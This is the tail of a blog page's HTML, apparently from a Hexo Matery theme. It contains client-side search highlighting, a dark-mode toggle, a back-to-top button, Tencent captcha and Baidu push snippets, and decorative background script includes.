                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
    
    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    
    <script type="text/javascript" color="0,0,255"
        pointColor="0,0,255" opacity='0.7'
        zIndex="-1" count="99"
        src="/libs/background/canvas-nest.js"></script>
    

    
    
    <script type="text/javascript" size="150" alpha='0.6'
        zIndex="-1" src="/libs/background/ribbon-refresh.min.js" async="async"></script>
    

    
    <script type="text/javascript" src="/libs/background/ribbon-dynamic.js" async="async"></script>
    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
